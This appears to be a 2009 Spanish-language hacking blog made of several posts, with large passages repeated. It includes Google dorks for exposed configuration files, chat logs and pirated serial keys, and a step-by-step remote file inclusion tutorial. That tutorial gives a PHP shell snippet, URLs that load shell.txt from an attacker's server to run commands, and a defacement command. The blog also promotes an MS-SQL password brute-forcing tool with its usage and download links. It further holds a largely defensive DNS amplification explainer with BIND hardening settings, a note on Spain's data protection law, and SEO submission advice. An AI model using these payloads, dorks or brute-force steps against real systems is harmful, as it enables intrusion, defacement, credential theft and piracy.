Aki se pondran una seria de scripts k hacen de google un gran buscador:
Ver ficheros k contienen nombres de usuario:
filetype:conf inurl:proftpd.conf -sample
Obteniendo logs o info Adulterada mentiras algo sensible:
"Index of" / "chat/logs"
Buscar Seriales:
"Adobe PhotoShop" "Belarc Advisor Current Profile" key:
Nota: Lo k dice en las primeras comillas se cambiara por el Soft k uds buscan.. Es todo y hace unas buskedas lindas xD otro ejm ps pa la hp gente k no entiende:
"Windows XP Professional" "Belarc Advisor Current Profile" key:
Bajando musik desde el buscador:
intitle:index.of "tipo de archivo" +"que quieres buscar" -htm -html -php -asp
El ejm concreto seria:
intitle:index.of "mp3" + "zona ganjah" -htm -html -php -asp
Y asi pueden ser grupos como callejeros bulldog jaja mentiras cada kien con su estilo
Pronto mas aventuras Googleanas
25.8.09
RFI para la sociedad jej xD Saludos
Introduccion:
Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.
La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:
http://[servidor_victima]/index.php?.
Para obtener la shell de la web solo necesitamos este codigo:
http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.
Esa seria una web vulenerable.
Ejemplo:http//ww.rush.com/index.php?
Para poder hacer un ataque RFI tendremos que hacer esto:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(comando)
Para saber si es vulnerable en el block de notas pegas esto
system($cmd)
?>
aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.
Oora procedemos a usar esto:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(aqui va el comando.)
y listo asi explotaran el comando.
Un ejemplo de una shell explotada:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd
pwd�??> nos muestra en que parte del servidor estamos por ejemplo:
Home/host/www
Una Shell para sobreescribir un archivo es:
/shell.txt?&cmd=Defaced By: rUsH >index.php.
Para ejecutar mas de un comando solo usen esto “;�?
/shell.txt?&cmd=[coamando];[Comando];[Comando]
Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando
/shell.txt?&cmd=ls -la �??> y te mostrara los permisos con sus respectivos archivos
Para saber los datos de la DB usa este comando:
/shell.txt?&cmd=cd
Es todo.
By:rUsH
Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.
La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:
http://[servidor_victima]/index.php?.
Para obtener la shell de la web solo necesitamos este codigo:
http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.
Esa seria una web vulenerable.
Ejemplo:http//ww.rush.com/index.php?
Para poder hacer un ataque RFI tendremos que hacer esto:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(comando)
Para saber si es vulnerable en el block de notas pegas esto
system($cmd)
?>
aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.
Oora procedemos a usar esto:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(aqui va el comando.)
y listo asi explotaran el comando.
Un ejemplo de una shell explotada:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd
pwd�??> nos muestra en que parte del servidor estamos por ejemplo:
Home/host/www
Una Shell para sobreescribir un archivo es:
/shell.txt?&cmd=Defaced By: rUsH >index.php.
Para ejecutar mas de un comando solo usen esto “;�?
/shell.txt?&cmd=[coamando];[Comando];[Comando]
Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando
/shell.txt?&cmd=ls -la �??> y te mostrara los permisos con sus respectivos archivos
Para saber los datos de la DB usa este comando:
/shell.txt?&cmd=cd
Es todo.
By:rUsH
Attack DNS??? umm y D.O.S
1. DoS contra el servidor de nombres
2. Ataque de DNS Amplification
3. Servidores vulnerables
4. Impacto Potencial
5. Recomendaciones
6. Conclusiones
7. Faq
8. Referencias
1. DoS contra el servidor de nombres
De forma general, los ataques de negación de servicio pretenden sobrecargar las redes y servidores con un conjunto de solicitudes o respuestas con el fin de sacar de operación a dichos servicios.
La tendencia en el uso de ataques de negación de servicio a través del uso de peticiones spoof al DNS en últimas fechas ha visto un incremento de consideración, este problema es fundamental tomando en cuenta que muchas de las comunicaciones en internet hacen uso del DNS.
2. Ataque de DNS Amplification
El atacante envía una alta cantidad de peticiones con una dirección IP falsificada (spoof) al DNS que permite recursión, el DNS procesa estas peticiones como si éstas fueran válidas mandando una respuesta al sistema al cual se quiere atacar, es decir al sistema víctima. Cuando estas peticiones alcanzan un volumen importante pueden inundar al sistema víctima de repuestas del DNS a las peticiones que se le realizan. Este ataque es llevado a cabo gracias a errores en la configuración del DNS y es llamado amplification puesto que los DNS al reflejar el ataque, potencian el nivel de éste hacia un blanco en especifico a causa de que las respuestas del servidor de nombres son de un tamaño considerablemente mayor que las peticiones que se le realizan causando con esto, en ocasiones, la caída del servicio y con ello la negación del mismo.
3. Servidores vulnerables
Los ataques de este tipo son susceptibles de ser exitosos en servidores de nombres de dominio en los cuales la recursión esté activada; esto es en una inmensa mayoría de los servidores de este tipo. Para hacer una detección exitosa de este tipo de servidores se puede hacer realizando un escaneo con ciertas herramientas las cuales nos indican el nivel de recursión que implementan los servidores de dominio. Algunas de estas son :
*
DNSCheck
Esta herramienta web nos indica el nivel de recursión implementado en lo servidores de nombre que se hayan especificado a través del nombre del dominio
http://dnscheck.se/
*
dlint
Herramienta libre que pude ser de utilidad al indicarnos las subzonas de un dominio en específico, indicándonos si en ésta se lleva a cabo la recursión o no.
4. Impacto Potencial
La potencialidad de este ataque es de dimensiones sumamente grandes puesto que la mayoría de los servidores de nombre en internet tiene un problema en cuanto a la configuración de la recursión (que se describe en la sección siguiente), causa por la cual un ataque coordinado podría tener consecuencias desastrosas con incluso la caída de internet o la negación de servicio en muchos de sus servidores de nombres. El aumento en este tipo de prácticas nos da una idea y una base fundamentada para tomar medidas precautorias que nos ayuden y preparen para un ataque de estas magnitudes
5. Recomendaciones
En un sentido más amplio, la recursión es completamente inevitable puesto que al desaparecer esta, la razón de ser y la utilidad del DNS pierde la funcionalidad casi por completo. Esto se debe a la necesidad en el sistema de nombres de consultar a distintos servidores DNS puesto que la mayoría de las veces el DNS autoritativo para nuestro dominio no tendrá la respuesta a nuestra consulta y tendrá que preguntar en forma recursiva a partir de los DNS raíz hasta encontrar el DNS que pueda resolver nuestra consulta. Es decir, en estricto sentido la recursión no es ningún error de configuración. Se convierte en error al tiempo de que no se restringe la recursión en el servicio de nombres a solo una lista de solicitantes en los cuales confiamos. Una práctica de configuración ampliamente recomendable sería el permitir la realización de consultas recursivas solo a un grupo específico de direcciones IP. Si bien el riesgo no es completamente eliminado si logramos mitigar en gran medida la posibilidad de ser víctimas de una práctica maliciosa de este tipo.
Por otra parte una regla que debe aplicarse para minimizar el riesgo de DNS amplification es la del mínimo privilegio, esto es, un DNS no tiene que permitir la recursión a nadie mas que a los host estrictamente indispensables. Si nuestro DNS no tiene la necesidad de realizar consultas recursivas, puesto que no tenemos un dominio de menor jerarquía al cual permitirle la recursión, no existe la necesidad de permitirla o, en el caso de que tengamos ciertos dominios de mas baja jerarquía, debemos permitir la recursión solo a los hosts en los cuales tengamos confianza.
Ahora bien, ¿por qué limitar la recursión?. Si hasta ahora permitimos en nuestros servidores de nombres la recursión ilimitada (es decir, permitimos las consultas recursivas sin validar antes quién nos las está solicitando), estamos aumentando la posibilidad de que nuestro servidor DNS sea utilizado para hacer ataques de DoS ya que al no validar cualquier host puede realizar consultas falsificando la IP redirigiendo un ataque amplificado hacia cualquier objetivo de la red. Por otro lado, al configurar nuestro servicio de nombres restringiendo las IPs que nos pueden realizar consultas recursivas lo que hacemos es que nuestro servidor no podrá ser utilizado para llevar acabo ataques DoS a menos que se logre la falsificación de una de las IPs a las cuales tenemos otorgado el permiso de recursión
A continuación se describe quién se vería afectado y de que manera en el caso de una restricción de la recursión en un DNS.
En el caso de que se realice una restricción de la recursión, se verán afectados aquellos usuarios de nuestro DNS los cuales salgan del rango de IPs que nosotros tengamos configuradas. En este caso se verán afectados puesto que no les será posible acceder al servicio de nombres, cuando menos a partir de nuestro servidor DNS.
Todos los usuarios que tengan una IP que pertenezca al rango establecido en la configuración previamente mencionada no se verán afectados de ninguna manera puesto que el servicio de DNS les seguirá siendo proporcionado sin diferencia alguna.
5.1 Ejemplos de configuración recomendada (eliminar recursión)
5.1.1 Bind 8/9
En el siguiente ejemplo tenemos la configuración deseable (en BIND 8/9) para un servidor de nombres el cual no tiene ningún dominio de menor jerarquía al cual tengamos estrictamente que permitirle realizar consultas recursivas
options {
directory "/var/named";
recursion no;
};
5.1.2 Microsoft DNS
En el caso de Microsoft DNS se realizaría añadiendo un registro de tipo REG_DWORD llamado NoRecursion con el valor 1.a la siguiente llave del registro
HKEY_LOCAL:MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
5.2 Ejemplos de configuración recomendada (limitar recursión)
5.2.1 Bind 8/9
El siguiente ejemplo es útil en el caso en que tengamos dominios de menor jerarquía a los cuales tengamos que permitirles la recursión siempre y cuando esos hosts sean de nuestra confianza (BIND 8/9).
acl recurseallow { x.x.x.x; y.y.y.y; z.z.z.z; };
options {
directory "/var/named";
allow-recursion { recurseallow; };
};
5.2.2 Microsoft DNS
En el servidor de DNS de Microsoft Windows 2000 no existe manera conocida para hacer un bloqueo discriminatorio entre las IPs a las cuales otorgarles la recursión y a cuáles no. Es decir, la única manera que resultaría efectiva sería definir reglas en un firewall que bloqueen el protocolo UDP por el puerto 53 de entrada y arriba del 1023 de salida para las IPs que no tengamos contemplado permitirles la realización de queries.
* Referencia: Building Internet Firewalls 2da edición
6. Conclusiones
La recursión en el servicio de nombres no puede ser eliminada pero si puede ser controlada a través de la correcta configuración de los hosts a los cuales les es permitido hacer consultas recursivas en nuestro DNS. Si bien esto no elimina el riesgo de que nuestro DNS pueda ser usado como amplificador de recursión, sí disminuye el riesgo de manera considerable.
¿Porque no se elimina el riesgo?
El riesgo no se puede eliminar por el hecho de que siempre existe la posibilidad de que un atacante falsifique alguna IP para la cual nuestro servidor de nombres permite las consultas recursivas haciendo que el riesgo siempre esté latente. ¿Puede nuestro servidor ser víctima de la amplificación en la recursión producto del ataque a otro servidor DNS?
Si bien se puede mitigar el riego de que nuestro servidor lleve a cabo ataques a partir de la amplificación de recursión, nuestro servidor no puede ser responsable de la correcta configuración de los servidores que puedan llegar a realizar peticiones. Es decir , nuestro servidor puede ser víctima de un ataque de amplificación aun cuando en nuestro servidor no existan errores en la configuración, ya que las peticiones enviadas serían procesadas como válidas.
Existen medidas que pueden ayudarnos a contrarrestar este tipo de acciones utilizando herramientas de detección de peticiones provenientes de IPs falsificadas (spoof) por ejemplo basadas en el calculo del TTL (tiempo de vida) de los paquetes. Un ejemplo de una herramienta de este tipo es despoof, herramienta para el servidor de nombres BIND.
7.FAQ
1 ¿A quien permitirle la recursión?
Es recomendable permitir la realización de consultas recursivas solo a aquellos hosts en los cuales confiamos o es indispensable proporcionar el servicio. Por ejemplo, en el caso de una universidad, solamente a las IPs que tengamos asignadas.
2 ¿En que casos es recomendable bloquear por completo la recursión?
En los casos en los cuales nuestro dominio no tenga un dominio de menor jerarquía al cual debamos permitir la recursión. Es decir, en la estructura jerárquica del DNS las hojas de ese árbol tendrían que tener la recursión bloqueada.
3 ¿Es indispensable la recursión?
La recursión en las consultas al DNS se vuelve indispensable ya que el DNS en su conjunto es una base de datos distribuida, eso significa que no todos los datos que queremos obtener van a estar siempre en nuestro servidor predeterminado, por lo cual es necesario que nuestro servidor haga consultas a otros DNS para obtener la información de nuestro interés.
4 ¿Porque se produce una Negación de Servicio con este ataque?
Esto se debe a que el servidor DNS produce una respuesta mucho más grande en comparación con las peticiones que recibe. Estas respuestas en cantidades considerables pueden llegar a bloquear la actividad de otra máquina además de afectar el ancho de banda de la red en la que se produzca el ataque
2. Ataque de DNS Amplification
3. Servidores vulnerables
4. Impacto Potencial
5. Recomendaciones
6. Conclusiones
7. Faq
8. Referencias
1. DoS contra el servidor de nombres
De forma general, los ataques de negación de servicio pretenden sobrecargar las redes y servidores con un conjunto de solicitudes o respuestas con el fin de sacar de operación a dichos servicios.
La tendencia en el uso de ataques de negación de servicio a través del uso de peticiones spoof al DNS en últimas fechas ha visto un incremento de consideración, este problema es fundamental tomando en cuenta que muchas de las comunicaciones en internet hacen uso del DNS.
2. Ataque de DNS Amplification
El atacante envía una alta cantidad de peticiones con una dirección IP falsificada (spoof) al DNS que permite recursión, el DNS procesa estas peticiones como si éstas fueran válidas mandando una respuesta al sistema al cual se quiere atacar, es decir al sistema víctima. Cuando estas peticiones alcanzan un volumen importante pueden inundar al sistema víctima de repuestas del DNS a las peticiones que se le realizan. Este ataque es llevado a cabo gracias a errores en la configuración del DNS y es llamado amplification puesto que los DNS al reflejar el ataque, potencian el nivel de éste hacia un blanco en especifico a causa de que las respuestas del servidor de nombres son de un tamaño considerablemente mayor que las peticiones que se le realizan causando con esto, en ocasiones, la caída del servicio y con ello la negación del mismo.
3. Servidores vulnerables
Los ataques de este tipo son susceptibles de ser exitosos en servidores de nombres de dominio en los cuales la recursión esté activada; esto es en una inmensa mayoría de los servidores de este tipo. Para hacer una detección exitosa de este tipo de servidores se puede hacer realizando un escaneo con ciertas herramientas las cuales nos indican el nivel de recursión que implementan los servidores de dominio. Algunas de estas son :
*
DNSCheck
Esta herramienta web nos indica el nivel de recursión implementado en lo servidores de nombre que se hayan especificado a través del nombre del dominio
http://dnscheck.se/
*
dlint
Herramienta libre que pude ser de utilidad al indicarnos las subzonas de un dominio en específico, indicándonos si en ésta se lleva a cabo la recursión o no.
4. Impacto Potencial
La potencialidad de este ataque es de dimensiones sumamente grandes puesto que la mayoría de los servidores de nombre en internet tiene un problema en cuanto a la configuración de la recursión (que se describe en la sección siguiente), causa por la cual un ataque coordinado podría tener consecuencias desastrosas con incluso la caída de internet o la negación de servicio en muchos de sus servidores de nombres. El aumento en este tipo de prácticas nos da una idea y una base fundamentada para tomar medidas precautorias que nos ayuden y preparen para un ataque de estas magnitudes
5. Recomendaciones
En un sentido más amplio, la recursión es completamente inevitable puesto que al desaparecer esta, la razón de ser y la utilidad del DNS pierde la funcionalidad casi por completo. Esto se debe a la necesidad en el sistema de nombres de consultar a distintos servidores DNS puesto que la mayoría de las veces el DNS autoritativo para nuestro dominio no tendrá la respuesta a nuestra consulta y tendrá que preguntar en forma recursiva a partir de los DNS raíz hasta encontrar el DNS que pueda resolver nuestra consulta. Es decir, en estricto sentido la recursión no es ningún error de configuración. Se convierte en error al tiempo de que no se restringe la recursión en el servicio de nombres a solo una lista de solicitantes en los cuales confiamos. Una práctica de configuración ampliamente recomendable sería el permitir la realización de consultas recursivas solo a un grupo específico de direcciones IP. Si bien el riesgo no es completamente eliminado si logramos mitigar en gran medida la posibilidad de ser víctimas de una práctica maliciosa de este tipo.
Por otra parte una regla que debe aplicarse para minimizar el riesgo de DNS amplification es la del mínimo privilegio, esto es, un DNS no tiene que permitir la recursión a nadie mas que a los host estrictamente indispensables. Si nuestro DNS no tiene la necesidad de realizar consultas recursivas, puesto que no tenemos un dominio de menor jerarquía al cual permitirle la recursión, no existe la necesidad de permitirla o, en el caso de que tengamos ciertos dominios de mas baja jerarquía, debemos permitir la recursión solo a los hosts en los cuales tengamos confianza.
Ahora bien, ¿por qué limitar la recursión?. Si hasta ahora permitimos en nuestros servidores de nombres la recursión ilimitada (es decir, permitimos las consultas recursivas sin validar antes quién nos las está solicitando), estamos aumentando la posibilidad de que nuestro servidor DNS sea utilizado para hacer ataques de DoS ya que al no validar cualquier host puede realizar consultas falsificando la IP redirigiendo un ataque amplificado hacia cualquier objetivo de la red. Por otro lado, al configurar nuestro servicio de nombres restringiendo las IPs que nos pueden realizar consultas recursivas lo que hacemos es que nuestro servidor no podrá ser utilizado para llevar acabo ataques DoS a menos que se logre la falsificación de una de las IPs a las cuales tenemos otorgado el permiso de recursión
A continuación se describe quién se vería afectado y de que manera en el caso de una restricción de la recursión en un DNS.
En el caso de que se realice una restricción de la recursión, se verán afectados aquellos usuarios de nuestro DNS los cuales salgan del rango de IPs que nosotros tengamos configuradas. En este caso se verán afectados puesto que no les será posible acceder al servicio de nombres, cuando menos a partir de nuestro servidor DNS.
Todos los usuarios que tengan una IP que pertenezca al rango establecido en la configuración previamente mencionada no se verán afectados de ninguna manera puesto que el servicio de DNS les seguirá siendo proporcionado sin diferencia alguna.
5.1 Ejemplos de configuración recomendada (eliminar recursión)
5.1.1 Bind 8/9
En el siguiente ejemplo tenemos la configuración deseable (en BIND 8/9) para un servidor de nombres el cual no tiene ningún dominio de menor jerarquía al cual tengamos estrictamente que permitirle realizar consultas recursivas
options {
directory "/var/named";
recursion no;
};
5.1.2 Microsoft DNS
En el caso de Microsoft DNS se realizaría añadiendo un registro de tipo REG_DWORD llamado NoRecursion con el valor 1.a la siguiente llave del registro
HKEY_LOCAL:MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
5.2 Ejemplos de configuración recomendada (limitar recursión)
5.2.1 Bind 8/9
El siguiente ejemplo es útil en el caso en que tengamos dominios de menor jerarquía a los cuales tengamos que permitirles la recursión siempre y cuando esos hosts sean de nuestra confianza (BIND 8/9).
acl recurseallow { x.x.x.x; y.y.y.y; z.z.z.z; };
options {
directory "/var/named";
allow-recursion { recurseallow; };
};
5.2.2 Microsoft DNS
En el servidor de DNS de Microsoft Windows 2000 no existe manera conocida para hacer un bloqueo discriminatorio entre las IPs a las cuales otorgarles la recursión y a cuáles no. Es decir, la única manera que resultaría efectiva sería definir reglas en un firewall que bloqueen el protocolo UDP por el puerto 53 de entrada y arriba del 1023 de salida para las IPs que no tengamos contemplado permitirles la realización de queries.
* Referencia: Building Internet Firewalls 2da edición
6. Conclusiones
La recursión en el servicio de nombres no puede ser eliminada pero si puede ser controlada a través de la correcta configuración de los hosts a los cuales les es permitido hacer consultas recursivas en nuestro DNS. Si bien esto no elimina el riesgo de que nuestro DNS pueda ser usado como amplificador de recursión, sí disminuye el riesgo de manera considerable.
¿Porque no se elimina el riesgo?
El riesgo no se puede eliminar por el hecho de que siempre existe la posibilidad de que un atacante falsifique alguna IP para la cual nuestro servidor de nombres permite las consultas recursivas haciendo que el riesgo siempre esté latente. ¿Puede nuestro servidor ser víctima de la amplificación en la recursión producto del ataque a otro servidor DNS?
Si bien se puede mitigar el riego de que nuestro servidor lleve a cabo ataques a partir de la amplificación de recursión, nuestro servidor no puede ser responsable de la correcta configuración de los servidores que puedan llegar a realizar peticiones. Es decir , nuestro servidor puede ser víctima de un ataque de amplificación aun cuando en nuestro servidor no existan errores en la configuración, ya que las peticiones enviadas serían procesadas como válidas.
Existen medidas que pueden ayudarnos a contrarrestar este tipo de acciones utilizando herramientas de detección de peticiones provenientes de IPs falsificadas (spoof) por ejemplo basadas en el calculo del TTL (tiempo de vida) de los paquetes. Un ejemplo de una herramienta de este tipo es despoof, herramienta para el servidor de nombres BIND.
7.FAQ
1 ¿A quien permitirle la recursión?
Es recomendable permitir la realización de consultas recursivas solo a aquellos hosts en los cuales confiamos o es indispensable proporcionar el servicio. Por ejemplo, en el caso de una universidad, solamente a las IPs que tengamos asignadas.
2 ¿En que casos es recomendable bloquear por completo la recursión?
En los casos en los cuales nuestro dominio no tenga un dominio de menor jerarquía al cual debamos permitir la recursión. Es decir, en la estructura jerárquica del DNS las hojas de ese árbol tendrían que tener la recursión bloqueada.
3 ¿Es indispensable la recursión?
La recursión en las consultas al DNS se vuelve indispensable ya que el DNS en su conjunto es una base de datos distribuida, eso significa que no todos los datos que queremos obtener van a estar siempre en nuestro servidor predeterminado, por lo cual es necesario que nuestro servidor haga consultas a otros DNS para obtener la información de nuestro interés.
4 ¿Porque se produce una Negación de Servicio con este ataque?
Esto se debe a que el servidor DNS produce una respuesta mucho más grande en comparación con las peticiones que recibe. Estas respuestas en cantidades considerables pueden llegar a bloquear la actividad de otra máquina además de afectar el ancho de banda de la red en la que se produzca el ataque
7.8.09
Bueno compas a conocer ke es LOPD ...
La Ley Orgánica 15/1999 de 13 de diciembre de Protección de Datos de Carácter Personal, (LOPD), es una Ley Orgánica española que tiene por objeto garantizar y proteger, en lo que concierne al tratamiento de los datos personales, las libertades públicas y los derechos fundamentales de las personas físicas, y especialmente de su honor, intimidad y privacidad personal y familiar.
Su objetivo principal es regular el tratamiento de los datos y ficheros, de carácter personal, independientemente del soporte en el cual sean tratados, los derechos de los ciudadanos sobre ellos y las obligaciones de aquellos que los crean o tratan.
Mas info:
LOPDDDDDDDD
Waa LOPD
Saludos y ps mucha energia con esto LOPD aguante VIVELA-UNDER
Su objetivo principal es regular el tratamiento de los datos y ficheros, de carácter personal, independientemente del soporte en el cual sean tratados, los derechos de los ciudadanos sobre ellos y las obligaciones de aquellos que los crean o tratan.
Mas info:
LOPDDDDDDDD
Waa LOPD
Saludos y ps mucha energia con esto LOPD aguante VIVELA-UNDER
3.8.09
piggy - Download MS-SQL Password Brute Forcing Tool
Este es un excelente soft un desembale el HP, bueno lean dejen la maric*** Aki medio se explica como la estructura del soft
es otra herramienta para realizar ataques a contraseñas en línea que conjetura contra los servidores de Microsoft SQL.
Apoya los servidores múltiples de la exploración usando un archivo de diccionario o un archivo con cuentas predefinidas (las combinaciones del username y de la contraseña).
Es una herramienta simple bonita y tiene una verson binaria Win32 - es una línea de comando herramienta sin embargo.
Bueno aqui se da como una explicacion.. Seria ke lo pongamos en C: por ejm, y luego lo llamamos desde el PROMPT o CMD, y luego se llama por las funciones, bueno ps explico porke muchos no saben como hacerlo
Piggy v1.0.1 by patrik@cqure.net
--------------------------------
usage: piggy [options]
options:
-u [username] - Single username
-p [password] - Single password
-s [server] - Single server
-S [srvfile] - File containing ip/hostnames
-D [dicfile] - File containing passwords
-A [accounts] - File containing username;password combinations
-N - Do not check availability before scan
-v verbose - Verbose logging
Puedes descargarlo aquí:
http://www.cqure.net/tools/piggy-src-1_0_1.zip
http://www.cqure.net/tools/piggy-win32-1_0_1.zip
Saludos Flameb, cualkier duda atento
es otra herramienta para realizar ataques a contraseñas en línea que conjetura contra los servidores de Microsoft SQL.
Apoya los servidores múltiples de la exploración usando un archivo de diccionario o un archivo con cuentas predefinidas (las combinaciones del username y de la contraseña).
Es una herramienta simple bonita y tiene una verson binaria Win32 - es una línea de comando herramienta sin embargo.
Bueno aqui se da como una explicacion.. Seria ke lo pongamos en C: por ejm, y luego lo llamamos desde el PROMPT o CMD, y luego se llama por las funciones, bueno ps explico porke muchos no saben como hacerlo
Piggy v1.0.1 by patrik@cqure.net
--------------------------------
usage: piggy [options]
options:
-u [username] - Single username
-p [password] - Single password
-s [server] - Single server
-S [srvfile] - File containing ip/hostnames
-D [dicfile] - File containing passwords
-A [accounts] - File containing username;password combinations
-N - Do not check availability before scan
-v verbose - Verbose logging
Puedes descargarlo aquí:
http://www.cqure.net/tools/piggy-src-1_0_1.zip
http://www.cqure.net/tools/piggy-win32-1_0_1.zip
Saludos Flameb, cualkier duda atento
Posicionamiento Web !!!! Kizas a mucho les importe ami me vale SHIT
Bueno Este post ahi pa el OSORNO-Edatel gran pana ahi dedicado jaja..... Saludos ojala y les sirva a todos, Ami por ejm esto me vale un monton de mierda no me gusta... Pero a muchos si les importa
Dar de alta en google y en otros
Aunque google no asegura que tu url la va a indexar mándala varias veces no te penaliza ni nada, también es importante darla de alta en otros buscadores aunque es cierto que q la mayoría usa google no esta de mas también inscribirlo en otros:
google
http://www.google.com/intl/es/addurl.html
msn
http://search.msn.com/docs/submit.aspx
yahoo altavista
http://es.altavista.com/addurl/default
DMOZ : Open Directory Project
DMOZ : Open Directory Project , ODP , o algunos le llaman directory de mozilla.
Para aparecer en los primeros lugares en google tienes que estar en ese directorio porque es donde se basa para listar las Webs
Intenta inscribirte realmente es difícil pero si lo consigues será un grande logro
¿nada mas google? no la mayoría AOL Search, Lycos, HotBot, DirectHit y otros cientos más
Dmoz.org
Es un directorio de webs creado por Netscape y AOL se divide en idiomas países categorías se basa en usuarios editores como la Wiki puedes entrar como editor pero no es necesario para que te agreguen tu Web al ser como la wiki existen parecidos problemas editores malos etc.
DMOZ es gratis y no lo confundas no es buscador aunque tiene uno pero solo es interno
es un directorio y es totalmente gratis aparecen sitios basura en DMOZ pero porque lleva varios años online desde 1998
Recomendaciones de tu Web
tiene que estar bien hecha no la clásica que parece geocities de hace 15 años no un myspaces spacelive tener dominio propio Web terminada:
Ejemplo no próximamente y que algunos link están muertos tu Web tiene q estar bien hecha accesible y no confusa para tus visitantes
si esta hecha con algún script prefabricado dejarle los créditos sin faltas de ortografía sugiérelo en la categoría correcta si algún sitio de tu competencia (temática) esta ve que categoría es y ahí inscribe tu Web no la mandes varias veces por que los editores se molestan y no la mandas en cada categoría mándala en una y los editores si ven que podría tener doble triple etc. la pondrán existen rumores que algunos editores cobran por aceptarte la Web si detectas algún abuso en el DMOZ Escribe en http://dmoz.org/cgi-bin/feedback.cgi
Como sugerir un sitio a DMOZ
fuente:http://www.dmoz.org
Paso1
¿Cómo agrego un sitio al Open Directory Project?
Agregar un sitio es fácil. Simplemente siga estas instrucciones.
Cómo sugerir un sitio a Open Directory
* No envíe sitios espejo. Sitios espejo son aquellos que tienen un contenido idéntico pero con URLs distintos.
* No envíe URLs que contengan únicamente el mismo o similar contenido que otros sitios que puedan estar listados en el directorio. Sitios con contenido coincidente y repetitivo no son útiles para los usuarios del directorio. Múltiples envíos del mismo sitio o de sitios relacionados puede producir que sean excluidos y/o borrados estos sitios y todos sus afiliados.
* No disfrace sus envíos para sugerir el mismo URL más de una vez.
Ejemplo:
http://www.dmoz.org
http://www.dmoz.org/index.html
* No envíe ningún sitio con una URL que redireccione a otra distinta.
* El Open Directory tiene una política contra la inclusión de sitios con contenido ilegal. Ejemplos de material ilegal incluyen pornografía infantil, difamación, materiales que infrinjan algún derecho de la propiedad intelectual y material que específicamente apoye, solicite o ampare actividades ilegales (como el fraude o la violencia).
* No envíe sitios "En construcción". Espere hasta que el sitio esté terminado antes de enviarlo. Sitios incompletos, con avisos "En construcción" o que contengan gráficos o enlaces rotos no son buenos candidatos para el directorio.
* Envíe los sitios de pornografía a la categoría apropiada dentro de Adult.
* Envíe los que no están en inglés a la categoría apropiada dentro de World.
* No envíe sitios compuestos mayoritariamente por enlaces afiliados.
Paso 2
Realice una búsqueda rápida en el directorio en dmoz.org para asegurarse de que su sitio no está ya incluido. De esta forma todos ahorraremos tiempo.
Paso 3
Identifique la categoría (una sola) que mejor defina su sitio. El Open Directory posee una enorme variedad de temas entre los que elegir. Deber enviar su sitio a una única categoría, la que sea más relevante. Los sitios enviados a categorías inapropiadas o no relacionadas pueden ser rechazados o eliminados.
Nota: algunas categorías no ofrecen los enlaces "Sugerir URL" o "Actualizar URL". Estas categorías no aceptan envíos, por lo tanto debería encontrar una categoría más específica para su sitio.
Paso 4
Una vez que ha seleccionado la mejor categoría para su sitio, vaya directamente a esa categoría en dmoz.org y entonces utilice "Sugerir URL". Siga las instrucciones del formulario de envío cuidadosamente. La descripción debería informar del contenido del sitio de forma concisa y precisa. No deben ser de naturaleza promocional.
Enviar una descripción promocional en vez de una objetiva y bien escrita puede retrasar significativamente el listado de su sitio o impedir totalmente que sea listado.
El software para el envío automático de sitios es (y siempre ha sido) una violación de este proceso. Los sitios enviados automáticamente son marcados y después de aceptarse el envío, borrados sin notificárselo. Los envíos automatizados enviados de forma persistente nos obligarán a excluirle de dmoz, así podremos ofrecer los recursos a personas reales.
Un editor de ODP revisará su envío para determinar si se incluirá en el directorio. En función de distintos factores como el volumen de envíos a una categoría en particular, puede llevar hasta varias semanas o más antes de que su envío sea revisado. Por favor envíe cada URL al Open Directory una sola vez. Le repetimos que el envío reiterado del mismo o de sitios relacionados puede conllevar la exclusión y/o eliminación de ésos y todos los sitios afiliados.
Disfrazar su envío y sugerir la misma URL más de una vez no está permitido.
Actualizar su sitio
Si un sitio ha sido aceptado en el directorio pero no está satisfecho con la descripción o el título del sitio, puede ir a la categoría donde está listado y rellenar el formulario "actualizar URL". Si no está satisfecho con la categoría donde su sitio está listado, puede enviar un email a un editor de la categoría explicando su desacuerdo. Sea civilizado y educado, los comportamientos amenazadores u ofensivos no serán tolerados.
Si (y sólo si) no está de acuerdo con la respuesta del editor, puede usar el enlace "reportar abuso/spam" en la parte superior de la página para recurrir la decisión del editor. Sea concreto con respecto a su desacuerdo (incluyendo por qué piensa que la respuesta del editor es inadecuada). Los comentarios realizados por medio del enlace "reportar abuso/spam" son revisados por el staff del ODP, que tomará la decisión final. Por favor, NO envíe mensajes a Netscape, eso sólo retrasará y complicará el proceso. Nos tomamos muy en serio las observaciones y les prestamos gran atención. Pero recuerde que debemos mantener nuestro criterio y realizar numerosos juicios sobre cómo hacer el ODP tan útil como sea posible, independientemente de la decisión que tomemos, no conseguiremos satisfacer siempre a todos.
Posicionando su sitio en portales y motores de búsqueda que utilizan los datos del ODP
Si su sitio ha sido aceptado en el Open Directory, puede tardar de dos semanas a varios meses en ser listado en los sitios que utilizan los datos del ODP, como por ejemplo AOL Search, Google, Netscape Search, Yahoo Search, y otros cientos de sitios. Actualizamos los datos disponibles semanalmente, pero cada uno de estos sitios tiene su propio calendario de actualizaciones.
Criterio editorial
Procedimiento una vez que ha sugerido su sitio
